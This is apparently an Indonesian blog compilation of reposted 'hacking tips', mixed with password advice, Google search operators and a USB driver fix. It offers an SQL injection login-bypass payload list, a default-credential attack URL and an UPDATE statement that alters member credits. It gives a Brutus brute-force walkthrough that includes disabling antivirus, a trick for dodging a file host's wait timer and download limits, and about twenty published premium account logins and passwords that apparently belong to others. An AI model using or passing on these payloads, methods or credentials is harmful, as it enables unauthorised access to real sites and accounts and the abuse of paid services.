TCH Happy Browser

HAPPY BROWSER BETA V.0.9.1(HB) adalah sebuah tools yang dikembangkan untuk security tool di platform windows pada tahun 1999 dengan versi tester. Happy Browser bisa dengan mudah dipakai oleh setiap orang yang ingin memeriksa vulnerebillitas pada NT-server/webserver, tools ini dapat digunakan secara mudah dan sederhana, belakangan juga tools ini bisa dimafaatkan untuk melakukan scanning web untuk mencari kelemahan web itu dengan mengintip security hole-nya.

Pada bagian address kita tinggal masukan web yang akan di scan kemudian enter, maka dproses scan dilakukan, dan hasil scan dapat dilihat pada window scanned. Datail situsnya akan tampil pada jendela results, dengan tools ini kita bisa mengecek server dan port apa saja yang terbuka, apabila barwarna merah artinya port tertutup dan jika ada port yang terbuka ditandai dengan logo warna kuning

Bagaimana password yang baik

Terkadang kita menyepelekan pembuatan password, padahal password adalah sebuah sandi yang sangat penting untuk keaman dan privasi kita. Sering kali orang membuat password sangat sederhana yang penting mudah diingat dan gampang penulisannya, misalnya nama pacar, nama anak, tanggal lahir, 1234, kata “password”, dll.
Seorang maling bisanya akan mempelajari kebiasaan korbannya, misalnya calon korban biasa meletakan kunci rumah di bawah keset di depan pintu,di rak sepatu atau di pot bunga, hal tersebut akan sangat memudahkan seorang maling yang ingin masuk rumah kita karena tempat panyimpanan yag udah biasa atau dalam istilah kita dalam kontek komputer di sebut “dafault”. Maka dengan mudah si cracker yang sudah mengenali kebiasaan kita akan menebak password calon korbannya misalnya :

1.nama belakang user
2.nama user
3.nama Tuhan-nya
4.nama istri
5.tempat lahir
6.tgl lahir
7.kode pos
8.kota tinggal
9.nama pacar,
10.atau hal-hal lain yang berhubungan dengan user
Dan beberapa hal yang berhubungan dengan user di sini misalnya password:
1.password
2.admin
3.administrator
4.user
5.root
6.dll

Ciri password buruk :
1.Terdiri 7 karakter atau kurang
2.Terdiri dari satu suku kata: cinta, love, peace, sandi, masuk, dll
3.Tidak terdiri dari kombinasi anggka dan karakter lain
4.Kombinasi karakter tapi memiliki arti : adm1n, h4ck3r,cr4c3r, dll

Barikut ini contoh password yang buruk :
12345
abc123
password
computer
28081986----------->tangal lahir(tgl,bln,thn)
123456
aaa
abc
academia
academic
access
root
ada
admin
administrator
adrian
adrianna
aerobics
cinta
love
damai
yesus
my jesus
my love
dst..

Contoh password yang baik :
1.Harus lebih dari 7 karakter
2.Terdiri 2 suku kata yang berbeda
3.Tidak memiliki arti
4.Terdiri dari campuran anggka, huruf, dan karakter lain
5.Jangan catat password anda di HP atau kertas (di ingat saja)
6.Bila mendapat password default segera di ganti
contoh:
1xxxbe_**
#78bgtg2
00(0kahan_2427hb]
,”kha*pakkd234
dll..


Trik mencari artikel dengan google

Kita tentu sudah pernah/sering mencari artikel-artikel untuk tugas-tugas kuliah dan untuk referensi lainnya dengan batuan mensin pencari google, tapi kadang kita mengami kesulitan mencari artikel yang kita inginkan karena hasil yang diberikan google yang tidak sesuai dengan apa yang diharapkan, hal ini dikarenakan pencarian yang tidak dibatasi sehingga google menampilkan semua kata yang mengandung kata kunci yang kita masukan.
Maka untuk membatasinya kita bisa menggunakan sintak google yang ada, seperti yang artikel sebelumnya yang pernah saya di post pada blog ini mengenai sintax google

1.Ketikan filetype: pada searce google, misalnya : filetype:doc matematika biner, maka yang akan ditampilkan adalah seluruh file yang bertipe doc = dokumen/biasanya msword yang mengandung kata matematika biner
2.Tentukan site-nya dengan menambahkan kata kunci site: misalnya filetype:doc matematika biner site:ac.id , maka google akan membatasi lagi pancarian hanya pada situs dengan domain ac.id. adalah domain untuk situs pendidikan
3.selain contoh di atas kita bisa mengkreasikan sendiri cara-cara penulisan pancarian ini dengan sitax google
ket:
doc = document/msword
exl = excel
ppt = p.point
pdf = pdf file
txt = text file/notepad
mdb = database/acces/sql,dll
etc…

Filetype:
filetype:doc
filetype:pdf
filetype:exl
filetype:ppt
filetype:txt
filetype:mdb
etc…

site:info
site:org
site:com
site:ac.id
site:net
site:tv
site:or.id
etc…

4. Kita juga bisa menggunakan kata kunci related, ini berguna untuk memberi daftar web page yang serupa dengan situs yang kita arahkan, misalnya :
related:www.ilmukomputer.com, maka google akan menampilkan situs-situs yang serupa dengan www.ilmukomputer.com
5.Apabila kita ingin menampilkan judul yang tepat dengan kata kunci yang kita masukan kita bisa menggunakan Intitle: ini adalah sintax untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud, misalnya :
Intitle: matematika biner, Maka yang akan ditampilkan adalah data-data dengan judul matematika biner
Setiap sitax-sintax ini bisa kita gabungkan dan dikreasi sendiri menurut kebutuhan kita untuk membatasi pencarian artikelnya, ex:
filetype:pdf Intitle:matematika biner site:com

SQL Injection

Keuntungan yg diambil dari trik ini adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.
Default setting dari SQL adalah :

adminID = sa
password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password=''%20 artinya menggantikan "jarak spasi" Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--

Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com

from : http://jambihackerlink.tk/
Judul asli : Konsep dasar SQL Injection

Mengalihkan IP address saat browsing

Setiap kali kita brows pada suatu web tertentu maka IP addres kompi kita akan selalu tercatat oleh server atau admin tertentu, misalnya 202.65.3118.67. nomor-nomor ini menunjukan posisi, lokasi bahkan indentitas server kita saat brows.
Artinya kita sedang atau dapat dipantau oleh server web yang kita kunjungi...berikut adalah salah satu web yang dapat kita gunakan agar IP kita dapat dilencengkan adalah dengan http://www.anonymouse.org,Cara penggunaannya adalah:
  1. kunjungi http://www.anonymouse.org
  2. sekarang tinggal menambahkan alamat website yang akan dikunjungi misalnya http://anonymouse.org/cgi-bin/anon-www.cgi/[url target]
  3. contoh ketika anda mengunjungi nyon-nyos.blogspot.com dengan web proxyhttp://anonymouse.org/cgi-bin/anon-www.cgi/www.nyon-nyos.blogspot.com
Lihat IP anda sekarang maka akan berubah dengan IP lain..namun kelemahan cara ini adalah untuk load akan memakan waktu yang lama


Dikutip dari: o-om.blogspot.com

Menebak Password Dengan Brotus


Brotus adalah sebuah tools yang digunakan untuk menebak suatu password pada form password tertentu, misalnya pada halaman admin untuk sebuah database server, atau untuk kegunaan lainnya, cara kerjanya adalah mencari password atau nama user dengan membandingankan pilihan kata yang kita masukan, brotus akan berusaha mencari kemiripan pada database-nya
Scan dengan tools ini adalah cara lama dan sudah dianggap kuno oleh jagoan-jagoan hack, tapi tidak ada salahnya kita pelajari dan mengentahui cara lama ini untuk sekedar menambah pengetahuan kita. Brotus sendiri dibuat pertama kali Oktober 1998 dan diluncurkan versi January 2000 yang lalu,sebagai info untuk tahun 2004 uda di donLot 70ribu user


1.DonLot brotus di www.hoobie.net
2.Kita matikan dulu anti virus atau firewall soalnya brotus uda di pack jadi di anggap virus atau softwere berbahaya
3.Jalankan brotus-nya
4.Untuk membantu brotus agar lebih cepat scan ada baiknya tentukan pass mode-nya dan pass file-nya
5.Start, jika berhasil password dan nama user akan tampil dibawah
catatan:pastikan anda sudah terkoneksi dengan LAN atau sudah tahu ip addres server dan port tujuan anda jika blm tau gunakan tips ini dan yang ini
Kamu bisa mencoba-coba sendiri tools ini dengan mengotak-atik menu-menu yang tersedia untuk mendapatkan hasil yang baik. Sekali lagi ini cara lama, bukan bermaksud untuk menampilkan cara lama dan uda kuno,bahkan udah ga bisa lagi, tetapi logika dan cara kerjanya yang bisa kita pelajari, masih banyak tools lain yang seperti ini seperti JOHN THE RIPPER (JTR), dll! 


Mendapatkan Akses Premium Account di Rapidshare

Rapidshare[dot]de, situs penyedia layanan upload dan free download file, alternatif bagi para netter yang ingin tukar-menukar file. Cukup gunakan fasilitas upload berbasis web yang telah disediakan, catat alamat url file anda dan anda bisa mendownloadnya dari manapun lain waktu atau bagikan alamat url tersebut ke teman-teman anda jika anda ingin mereka juga "menikmati" file yang telah anda upload.
Ada 2 account yang ditawarkan oleh Rapidshare, yaitu Premium account dan Free Account. Masalahnya adalah pada Free account. User akan terganggu dengan adanya counter time. Counter time ini biasanya bisa mencapai lebih dari 1 menit. Jadi, rapidshare akan membuat anda menunggu selama kurang lebih satu menit sebelum menunjukkan url file yang nada minta. Huh.. cukup menyita waktu bukan?
Masalah kedua adalah Rapidshare akan mencatat alamat IP anda dan memberikan batasan untuk melakukan download.
Masalah ketiga, manusia selalu saja merasa kurang puas. Ketika dia sudah mendapatkan akses yang setara dengan premium account, dia akan berfikir, "gimana yach biar gue benr-bener dapet premium account". Okay, di artikel ini juga saya akan mewujudkan impian itu.
Sekarang, mari kita bahas ketiga masalah itu satu persatu.


:::::: Alat perang Kita ::::::
>> Seperangkat komputer dan koneksi internet ^_^
>> keberanian dan semangat yang tinggi Smile
>> Browser Mozilla Firefox

I. Melewati Conter Time
-------------------------
1. Copy-paste alamat (URL) file yang hendak anda download di address bar Mozilla.
2. Setelah halaman Rapidshare muncul, klik Free account.
3. Akan muncul counter down, abaikan saja, hapus string url di address bar anda hingga bersih, kemudian ketik kode java script berikut: javascript:alert(c=0)
4. Tekan ENTER, akan muncul sebuah message box di hadapan anda, tenang, jangan panik, tetap fokus dan bersabar ^_^ tekan saja [OK] dengan penuh percaya diri, counter down akan segera lenyap dari hadapan anda dan rapidshare akan menampilkan link download file yang ingin anda download.

II. Mengatasi Limit Download
------------------------------
Caranya simple, gunakan saja kumpulan proxy yang sudah diposting di www.spyrozone.tk halaman Artikel&Trik kategori komputer. Pilih sendiri dari ratusan proxy itu Smile

III. Benar-Benar Mendapatkan akses Premium Account
--------------------------------------------------
Jika kedua cara yang telah saya bahas hanya akan memberikan anda akses "setara" dengan premium account, kini anda akan benar-benar mendapatkan premium account! Gunakan saja User name dan password berikut:

LOGIN: 31989
PASSWORD: 2310214

LOGIN: 27766
PASSWORD: 8797341

User: 18549
Password: 4646182

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

Login: 20151
Password: 773290

Login: 20366
Password: 7177185

Login: 20374
Password: 5630758

Login: 20452
Password: 3249043

LOGIN: 20949
PASSWORD: 2716739

User: 22484
Password: 358030

User: 18549
Password: 4646182

User: 18800
Password: 9496722

LOGIN: 20949
PASSWORD: 2716739

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

Login: 20151
Password: 773290

Login: 20366
Password: 7177185

Login: 20374
Password: 5630758

Login: 20452
Password: 3249043


PENTING :
Gunakan trik dan account yang telah saya berikan untuk mendownload file-file yang bermanfaat. Sudah bukan jamannya lagi keterbatasan membatasi kita untuk belajar. Keep Learning and happy hacking..

Nyos Notes:
Tulisan ini diambil dari http://jogjahacking.cjb.net/
URL asli dari tulisan ini ada di posted: [14/02/2007, 04:43:08]
kategori : [tips and trik]
author : [WoNX]

Flashdisk dan perangakat baru jika Butuh Driver

Biasanya, pada windows XP, flashdisk kita akan langsung terdeteksi tampa harus minta driver karena Windows XP menggunakan sistem Plug n Play-nya (PnP) yaitu agar perangangkat baru yang ditemukan langsung terdeteksi tampa harus menginstal dulu
Nah bagaimana jika computer kita ganti perangkat baru atau flashdiks kita malah tidak dideteksi oleh windows dan meminta driver, padahal windowsnya sudah XP. Cara mengatasinya adalah:

1.Klik start, pilih Run
2.Ketik Services.msc dan enter
3.Perhatikan jendela sebelah kanan cari Universal Plug n Play Devices Host .
4.Klik kanan di servce tersebut dan pilih Properties



Pada kolom Startup Type pilih Automatic , kemudian klik tombol Start pada Service Status .
.6Pilih Apply dan Ok .
.7Restart computer anda
Dan kalau tetap tidak terdeteksi, mungkin sebaiknya anda pake driver juga atau ganti flashdisk. Atau perangkatnya hehe..